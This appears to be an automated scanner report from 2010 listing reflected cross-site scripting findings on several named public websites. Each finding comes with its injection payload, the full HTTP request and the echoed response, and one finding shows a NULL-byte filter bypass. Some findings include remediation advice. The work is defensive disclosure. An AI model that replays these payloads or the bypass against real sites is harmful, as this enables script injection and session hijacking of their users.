Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003b3c6"><script>alert(1)</script>f91c047f372 was submitted in the REST URL parameter 1. This input was echoed as 3b3c6"><script>alert(1)</script>f91c047f372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%003b3c6"><script>alert(1)</script>f91c047f372 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2f1'-alert(1)-'c17a993ea7e was submitted in the [Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html?[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT=6f2f1'-alert(1)-'c17a993ea7e HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396861659244; ts=12/13/2010+9:01:05+PM; z=4; sid=b6ff4608-269f-4916-824f-4c4e6c59df4e; av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419; vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:02 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=c0596.61a68=1213101501:51f37.5cfcb=1214101419:b8fb4.6339b=1218102102; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:61A68_0_0_0_1FB2C5_0_0|v51F37:5CFCB_0_0_0_1FB83B_0_0|vB8FB4:6339B_0_0_0_1FD04E_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 19 Dec 2010 03:03:01 GMT
Content-Length: 1128
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150d45525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:08:02 GMT;path=/
1.3. http://vancouverdisabilitiesday.ca/%20target= [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://vancouverdisabilitiesday.ca
Path: /%20target=
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb8d8"><script>alert(1)</script>2c87a4594e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /%20target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1 HTTP/1.1
Host: vancouverdisabilitiesday.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 727
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSAARTS=BHHGAGICMPCFNDPLDIPAAJMM; path=/
Cache-control: private
<html> <head> <title>International Day of Persons with Disabilities</title> <meta name="description" content="Dec. 3, 2008 Roundhouse Community Centre"> <meta name="keywords" content="dis ...[SNIP]... <frame src="http://members.shaw.ca/ckiyooka// target=?eb8d8"><script>alert(1)</script>2c87a4594e5=1" name="pageRedirect"> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d18<script>alert(1)</script>98cf4f6e2eb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/email/share/?callback=?a9d18<script>alert(1)</script>98cf4f6e2eb HTTP/1.1
Host: ww3.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 62
Connection: close
Content-Type: application/json
The value of the returnurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43f89'%3balert(1)//ba364a55228 was submitted in the returnurl parameter. This input was echoed as 43f89';alert(1)//ba364a55228 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/pluck/atc/?returnurl=43f89'%3balert(1)//ba364a55228 HTTP/1.1
Host: ww3.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 251
Connection: close
Content-Type: text/html; charset=UTF-8
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f878a"><script>alert(1)</script>30b222b59b0 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /Compare-Annuity-Rates-2?utm_source=Googlef878a"><script>alert(1)</script>30b222b59b0&utm_campaign=annuity_placement_targeting HTTP/1.1
Host: www.advisorworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:12 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.14 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-Control: max-age=1209600
Expires: Sun, 02 Jan 2011 03:06:12 GMT
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 16857
1.7. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ashoka.org
Path: /story/6495
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5291e"><script>alert(1)</script>8b1ed0d8a05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1 HTTP/1.1
Host: www.ashoka.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:17 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.8
Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=3gddqs6ddqmdpo5f9i2v30mlb7; expires=Tue, 11 Jan 2011 06:39:37 GMT; path=/; domain=.ashoka.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 19 Dec 2010 03:06:17 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26921
<!-- This comment is intentional to keep the back compat in ie 7.0 --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http:/ ...[SNIP]... <a name="fb_share" type="button_count" share_url="http://www.ashoka.org/story/6495?5291e"><script>alert(1)</script>8b1ed0d8a05=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.8. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ashoka.org
Path: /story/6495
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773df'-alert(1)-'5b4b835de75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/6495?773df'-alert(1)-'5b4b835de75=1 HTTP/1.1
Host: www.ashoka.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:06:18 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.8
Set-Cookie: SESS08b657267a8ac8cb7d48d3a9cb134ad3=dsp2ml8nb8mjok58innb7rlpl2; expires=Tue, 11 Jan 2011 06:39:38 GMT; path=/; domain=.ashoka.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 19 Dec 2010 03:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26876
<!-- This comment is intentional to keep the back compat in ie 7.0 --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http:/ ...[SNIP]... <script>tweetmeme_style = 'compact'; tweetmeme_url = 'http://www.ashoka.org/story/6495?773df'-alert(1)-'5b4b835de75=1'; tweetmeme_source = '';</script> ...[SNIP]...
1.9. http://www.canada.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.canada.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f46'%3balert(1)//9b6decae86e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5f46';alert(1)//9b6decae86e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d5f46'%3balert(1)//9b6decae86e=1 HTTP/1.1
Host: www.canada.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 272523
Expires: Sun, 19 Dec 2010 03:08:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:07 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=1camde55elyruhzm0d0hya45; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... acebook/poll.html'; var bundle_id = ''; var question = 'Is an e-mail a good enough substitute for a Christmas card?'; var voted = 'False'; var poll_url = 'http://www.canada.com/facebook/poll.html?d5f46';alert(1)//9b6decae86e=1&qid=106525'; var poll_topic = 'Christmas cards'; var encoded_poll_url = 'http%3a%2f%2fwww.canada.com%2ffacebook%2fpoll.html%3fd5f46'%3balert(1)%2f%2f9b6decae86e%3d1%26qid%3d106525'; var host = 'h ...[SNIP]...
1.10. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cheap-registrar.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d254"><script>alert(1)</script>ad40d2e47f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?5d254"><script>alert(1)</script>ad40d2e47f1=1 HTTP/1.1
Host: www.cheap-registrar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:07:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 738
<html><head> <meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business."> <title>$1.99 Registrations at Cheap Registrar</title></head> <!-- Redirec ...[SNIP]... <a href="http://www.securepaynet.net/5d254"><script>alert(1)</script>ad40d2e47f1=1"> ...[SNIP]...
1.11. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cheap-registrar.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2ea"><script>alert(1)</script>6b27097126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3a2ea"><script>alert(1)</script>6b27097126=1 HTTP/1.1
Host: www.cheap-registrar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:07:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 736
<html><head> <meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business."> <title>$1.99 Registrations at Cheap Registrar</title></head> <!-- Redirec ...[SNIP]... <frame src="http://www.securepaynet.net/3a2ea"><script>alert(1)</script>6b27097126=1" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df587<a>ce53c9e6599 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /products/df587<a>ce53c9e6599 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:47 GMT
Content-Length: 6763
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>ce53c9e6599">Whois record for "df587<a>ce53c9e6599"</a> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa5d8<a>c0b22e683b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /products/reports/aa5d8<a>c0b22e683b3 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 03:58:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 02:58:11 GMT
Content-Length: 6773
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>c0b22e683b3">Whois record for "aa5d8<a>c0b22e683b3"</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc9b4<a>517b058ca68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /products/fc9b4<a>517b058ca68 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:47 GMT
Content-Length: 6763
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>517b058ca68">Whois record for "fc9b4<a>517b058ca68"</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34784<a>3c620300a71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /reverse-ip/34784<a>3c620300a71 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;
Response
HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:32 GMT
Content-Length: 6765
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Domain Tools: Page Not Found</title>
<link rel="alternate" type="applicati ...[SNIP]... <a>3c620300a71">Whois record for "34784<a>3c620300a71"</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c848'%3bf5e376ba32d was submitted in the REST URL parameter 1. This input was echoed as 2c848';f5e376ba32d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2c848'%3bf5e376ba32d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9a4'%3b247ade30c83 was submitted in the REST URL parameter 1. This input was echoed as ce9a4';247ade30c83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ce9a4'%3b247ade30c83 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c4e2'%3bd9af8f915db was submitted in the REST URL parameter 1. This input was echoed as 9c4e2';d9af8f915db in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9c4e2'%3bd9af8f915db HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf31'%3bc915d077dc3 was submitted in the REST URL parameter 1. This input was echoed as 7cf31';c915d077dc3 in the application's response.
